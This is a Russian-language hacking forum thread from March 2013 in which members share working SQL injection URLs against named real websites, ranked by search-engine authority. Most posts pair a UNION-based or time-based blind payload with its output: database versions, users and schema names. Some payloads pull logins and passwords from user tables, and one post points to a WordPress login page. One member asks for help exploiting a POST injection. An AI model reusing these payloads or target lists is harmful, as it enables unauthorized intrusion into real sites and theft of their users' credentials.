 |
|
11.03.2013, 21:16
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
Провел на форуме:
46989
Репутация:
20
|
|
pr - 7
Код:
www.miamisci.org/www/employment-detail.php?jobID=1+LIMIT+0,1+UNION+ALL+SELECT+1,1,1,1,1,1,1,1,CONCAT(0x203d3e20,IFNULL(CAST(cal_email+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_is_admin+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_login+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_passwd+AS+CHAR),0x20),0x20),1,1+FROM+miamisci_calendar_ttec.webcal_user
|
|
|
12.03.2013, 10:33
|
|
Познающий
Регистрация: 19.07.2010
Сообщений: 91
Провел на форуме:
33658
Репутация:
19
|
|
PR:7
Код:
http://www.alia.org[dot]au/employment/vacancies/listing.html?ID=-2211+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+
PR:8
Код:
http://www.interactivedata[dot]de/prdetail.php?pr=290%0aand%0a0%0aUNION%0aSELECT%0a1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16+--+
|
|
|
|
18.03.2013, 01:24
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от None
http://www.mirograd.ru/catalog.php?id=-14+union+select+1,2,3,4,group_concat%28table_name% 29,version%28%29,7,database%28%29,9,10,11,12,13,14 ,15,16,17+from+information_schema.tables--&c_id=1416
тиц 180
|
|
|
|
18.03.2013, 03:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Код:
http://www.emmaturle .com/gall ery.php?id=-55+union+select+@@ver sion,2,3--
5.0.67-community-log-A-2
вывод в исходнике |
|
|
|
18.03.2013, 17:45
|
|
Новичок
Регистрация: 13.02.2012
Сообщений: 1
Провел на форуме:
249
Репутация:
0
|
|
скуль на сайте
Народ, вот столкнулся с такой проблемкой: Не получается раскрутить скуль в POST.. Пробывал havij и acunetix - ни чего не получается. Сама ссылка http://vpo.hiik.ru/cgi-bin/soob.pl а POST-запрос: idstud=9299&passw=32631835&soobsh=1'
После такой попытки эксплуатировать, в response headers выскакивает ошибка типа DBD: :mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''', flagproch=1' at line 1 at C:\Moodle19\server\vpocgi-bin\soob.pl line 25
Помогите, пожалуйста! Зараннее огромное спасибо!
|
|
|
|
18.03.2013, 18:08
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
conversionchronicles.com PR-5
Код:
www.conversionchronicles.com/print.php?PageID=10'+union+select+111,222,333,444,555,66,777,888,999,000,concat_ws(0x3a,version(),user(),database()),121212,131313,141414+--+
Код:
5.0.95:convchron@10.2.3.31:convchron
в исходниках
php.yccd.edu PR-5
Код:
php.yccd.edu/faculty/view_file.php?id=-516'+union+select+concat_ws(0x3a,version(),user(),database()),2,3+--+&type=file
Код:
5.1.66-community:root@localhost:facultypages
|
|
|
|
18.03.2013, 19:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Код:
http://consult.ni da.ac.th/ en/pr oject_detail.php?id=-123+union+select+1,2,3,4,5,@@ basedir,7,concat_ws(0 x3a,version(),user(),database()),9,10,11,12,13 ,14,15,16,17,18,19, 20,21,22,23, 24,25,26,27, 28,29,30,31--
|
|
|
|
19.03.2013, 09:09
|
|
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
Провел на форуме:
118953
Репутация:
37
|
|
www.naukri.com
Яндекс тИЦ (CY): 50
Alexa Rank: 433
Google PageRank (PR): 6
MySQL > 5.0.11 AND time-based blind
Код:
http://w28.naukri.com/advertiser/bms_hits.php?banner=1'+AND+6418=IF((ORD(MID((IFNULL(CAST(version()+AS+CHAR),0x2
0)),1,1))>64),SLEEP(5),6418)+AND+'QALq'='QALq
version(): '5.1.24-rc-log'
user: 'jobs'@'10.208.64.227'
DBS: 'BMS, bms2, information_schema, test, test_old, zedo_demographics'
|
|
|
|
20.03.2013, 19:57
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 4
Провел на форуме:
1152
Репутация:
0
|
|
Oracle
ТИЦ 60
ПР 2
Код:
absoluttrade.ru/index.php?opt=product&cid1=-2046+union+select+null,null,table_name,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+sys.user_tables--
Вот только раскрутить не получилось. Буду рад помощи в асю. |
|
|
|
21.03.2013, 01:03
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
Провел на форуме:
46989
Репутация:
20
|
|
www.johnlocke.org/fmm/display.html?id=-7937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, (SELECT CONCAT(0x5b20,IFNULL(CAST(user_login AS CHAR),0x20),0x203a20,IFNULL(CAST(user_pass AS CHAR),0x20),0x205d) FROM jlocke.wp_triad_users LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL#
Смотрите код.
http://triad.johnlocke.org/blog/wp-login.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
